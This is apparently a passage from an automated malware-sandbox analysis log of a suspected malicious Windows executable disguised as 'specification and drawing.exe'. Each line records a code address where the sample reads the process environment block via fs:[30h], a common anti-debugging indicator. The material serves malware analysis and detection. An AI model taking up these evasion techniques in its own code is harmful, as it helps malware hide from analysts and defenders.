                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01140283 mov eax, dword ptr fs:[00000030h]4_2_01140283
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov ecx, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011562A0 mov eax, dword ptr fs:[00000030h]4_2_011562A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA2C3 mov eax, dword ptr fs:[00000030h]4_2_010CA2C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D02E1 mov eax, dword ptr fs:[00000030h]4_2_010D02E1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D02E1 mov eax, dword ptr fs:[00000030h]4_2_010D02E1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D02E1 mov eax, dword ptr fs:[00000030h]4_2_010D02E1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156500 mov eax, dword ptr fs:[00000030h]4_2_01156500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194500 mov eax, dword ptr fs:[00000030h]4_2_01194500
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE53E mov eax, dword ptr fs:[00000030h]4_2_010EE53E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0535 mov eax, dword ptr fs:[00000030h]4_2_010D0535
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8550 mov eax, dword ptr fs:[00000030h]4_2_010C8550
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8550 mov eax, dword ptr fs:[00000030h]4_2_010C8550
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F656A mov eax, dword ptr fs:[00000030h]4_2_010F656A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F656A mov eax, dword ptr fs:[00000030h]4_2_010F656A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F656A mov eax, dword ptr fs:[00000030h]4_2_010F656A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F4588 mov eax, dword ptr fs:[00000030h]4_2_010F4588
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C2582 mov eax, dword ptr fs:[00000030h]4_2_010C2582
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C2582 mov ecx, dword ptr fs:[00000030h]4_2_010C2582
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE59C mov eax, dword ptr fs:[00000030h]4_2_010FE59C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011405A7 mov eax, dword ptr fs:[00000030h]4_2_011405A7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011405A7 mov eax, dword ptr fs:[00000030h]4_2_011405A7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011405A7 mov eax, dword ptr fs:[00000030h]4_2_011405A7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E45B1 mov eax, dword ptr fs:[00000030h]4_2_010E45B1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E45B1 mov eax, dword ptr fs:[00000030h]4_2_010E45B1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE5CF mov eax, dword ptr fs:[00000030h]4_2_010FE5CF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE5CF mov eax, dword ptr fs:[00000030h]4_2_010FE5CF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C65D0 mov eax, dword ptr fs:[00000030h]4_2_010C65D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA5D0 mov eax, dword ptr fs:[00000030h]4_2_010FA5D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA5D0 mov eax, dword ptr fs:[00000030h]4_2_010FA5D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC5ED mov eax, dword ptr fs:[00000030h]4_2_010FC5ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC5ED mov eax, dword ptr fs:[00000030h]4_2_010FC5ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE5E7 mov eax, dword ptr fs:[00000030h]4_2_010EE5E7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C25E0 mov eax, dword ptr fs:[00000030h]4_2_010C25E0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8402 mov eax, dword ptr fs:[00000030h]4_2_010F8402
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8402 mov eax, dword ptr fs:[00000030h]4_2_010F8402
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8402 mov eax, dword ptr fs:[00000030h]4_2_010F8402
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE420 mov eax, dword ptr fs:[00000030h]4_2_010BE420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE420 mov eax, dword ptr fs:[00000030h]4_2_010BE420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE420 mov eax, dword ptr fs:[00000030h]4_2_010BE420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BC427 mov eax, dword ptr fs:[00000030h]4_2_010BC427
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA430 mov eax, dword ptr fs:[00000030h]4_2_010FA430
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E245A mov eax, dword ptr fs:[00000030h]4_2_010E245A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B645D mov eax, dword ptr fs:[00000030h]4_2_010B645D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C460 mov ecx, dword ptr fs:[00000030h]4_2_0114C460
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EA470 mov eax, dword ptr fs:[00000030h]4_2_010EA470
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EA470 mov eax, dword ptr fs:[00000030h]4_2_010EA470
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EA470 mov eax, dword ptr fs:[00000030h]4_2_010EA470
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114A4B0 mov eax, dword ptr fs:[00000030h]4_2_0114A4B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C64AB mov eax, dword ptr fs:[00000030h]4_2_010C64AB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F44B0 mov ecx, dword ptr fs:[00000030h]4_2_010F44B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C04E5 mov ecx, dword ptr fs:[00000030h]4_2_010C04E5
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC700 mov eax, dword ptr fs:[00000030h]4_2_010FC700
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0710 mov eax, dword ptr fs:[00000030h]4_2_010C0710
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F0710 mov eax, dword ptr fs:[00000030h]4_2_010F0710
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113C730 mov eax, dword ptr fs:[00000030h]4_2_0113C730
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC720 mov eax, dword ptr fs:[00000030h]4_2_010FC720
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC720 mov eax, dword ptr fs:[00000030h]4_2_010FC720
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F273C mov eax, dword ptr fs:[00000030h]4_2_010F273C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F273C mov ecx, dword ptr fs:[00000030h]4_2_010F273C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F273C mov eax, dword ptr fs:[00000030h]4_2_010F273C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102750 mov eax, dword ptr fs:[00000030h]4_2_01102750
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102750 mov eax, dword ptr fs:[00000030h]4_2_01102750
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01144755 mov eax, dword ptr fs:[00000030h]4_2_01144755
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F674D mov esi, dword ptr fs:[00000030h]4_2_010F674D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F674D mov eax, dword ptr fs:[00000030h]4_2_010F674D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F674D mov eax, dword ptr fs:[00000030h]4_2_010F674D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E75D mov eax, dword ptr fs:[00000030h]4_2_0114E75D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0750 mov eax, dword ptr fs:[00000030h]4_2_010C0750
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8770 mov eax, dword ptr fs:[00000030h]4_2_010C8770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116678E mov eax, dword ptr fs:[00000030h]4_2_0116678E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C07AF mov eax, dword ptr fs:[00000030h]4_2_010C07AF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CC7C0 mov eax, dword ptr fs:[00000030h]4_2_010CC7C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011407C3 mov eax, dword ptr fs:[00000030h]4_2_011407C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E27ED mov eax, dword ptr fs:[00000030h]4_2_010E27ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E27ED mov eax, dword ptr fs:[00000030h]4_2_010E27ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E27ED mov eax, dword ptr fs:[00000030h]4_2_010E27ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E7E1 mov eax, dword ptr fs:[00000030h]4_2_0114E7E1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C47FB mov eax, dword ptr fs:[00000030h]4_2_010C47FB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C47FB mov eax, dword ptr fs:[00000030h]4_2_010C47FB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102619 mov eax, dword ptr fs:[00000030h]4_2_01102619
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E609 mov eax, dword ptr fs:[00000030h]4_2_0113E609
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C262C mov eax, dword ptr fs:[00000030h]4_2_010C262C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE627 mov eax, dword ptr fs:[00000030h]4_2_010DE627
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F6620 mov eax, dword ptr fs:[00000030h]4_2_010F6620
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8620 mov eax, dword ptr fs:[00000030h]4_2_010F8620
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DC640 mov eax, dword ptr fs:[00000030h]4_2_010DC640
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA660 mov eax, dword ptr fs:[00000030h]4_2_010FA660
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA660 mov eax, dword ptr fs:[00000030h]4_2_010FA660
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118866E mov eax, dword ptr fs:[00000030h]4_2_0118866E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118866E mov eax, dword ptr fs:[00000030h]4_2_0118866E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F2674 mov eax, dword ptr fs:[00000030h]4_2_010F2674
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4690 mov eax, dword ptr fs:[00000030h]4_2_010C4690
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4690 mov eax, dword ptr fs:[00000030h]4_2_010C4690
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC6A6 mov eax, dword ptr fs:[00000030h]4_2_010FC6A6
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F66B0 mov eax, dword ptr fs:[00000030h]4_2_010F66B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]4_2_010FA6C7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA6C7 mov eax, dword ptr fs:[00000030h]4_2_010FA6C7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E6F2 mov eax, dword ptr fs:[00000030h]4_2_0113E6F2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E6F2 mov eax, dword ptr fs:[00000030h]4_2_0113E6F2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E6F2 mov eax, dword ptr fs:[00000030h]4_2_0113E6F2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E6F2 mov eax, dword ptr fs:[00000030h]4_2_0113E6F2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011406F1 mov eax, dword ptr fs:[00000030h]4_2_011406F1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011406F1 mov eax, dword ptr fs:[00000030h]4_2_011406F1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C912 mov eax, dword ptr fs:[00000030h]4_2_0114C912
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8918 mov eax, dword ptr fs:[00000030h]4_2_010B8918
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8918 mov eax, dword ptr fs:[00000030h]4_2_010B8918
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E908 mov eax, dword ptr fs:[00000030h]4_2_0113E908
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E908 mov eax, dword ptr fs:[00000030h]4_2_0113E908
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114892A mov eax, dword ptr fs:[00000030h]4_2_0114892A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0115892B mov eax, dword ptr fs:[00000030h]4_2_0115892B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01140946 mov eax, dword ptr fs:[00000030h]4_2_01140946
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C97C mov eax, dword ptr fs:[00000030h]4_2_0114C97C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E6962 mov eax, dword ptr fs:[00000030h]4_2_010E6962
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E6962 mov eax, dword ptr fs:[00000030h]4_2_010E6962
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E6962 mov eax, dword ptr fs:[00000030h]4_2_010E6962
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01164978 mov eax, dword ptr fs:[00000030h]4_2_01164978
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01164978 mov eax, dword ptr fs:[00000030h]4_2_01164978
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110096E mov eax, dword ptr fs:[00000030h]4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110096E mov edx, dword ptr fs:[00000030h]4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110096E mov eax, dword ptr fs:[00000030h]4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C09AD mov eax, dword ptr fs:[00000030h]4_2_010C09AD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C09AD mov eax, dword ptr fs:[00000030h]4_2_010C09AD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011489B3 mov esi, dword ptr fs:[00000030h]4_2_011489B3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011489B3 mov eax, dword ptr fs:[00000030h]4_2_011489B3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011489B3 mov eax, dword ptr fs:[00000030h]4_2_011489B3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118A9D3 mov eax, dword ptr fs:[00000030h]4_2_0118A9D3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011569C0 mov eax, dword ptr fs:[00000030h]4_2_011569C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F49D0 mov eax, dword ptr fs:[00000030h]4_2_010F49D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E9E0 mov eax, dword ptr fs:[00000030h]4_2_0114E9E0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F29F9 mov eax, dword ptr fs:[00000030h]4_2_010F29F9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F29F9 mov eax, dword ptr fs:[00000030h]4_2_010F29F9
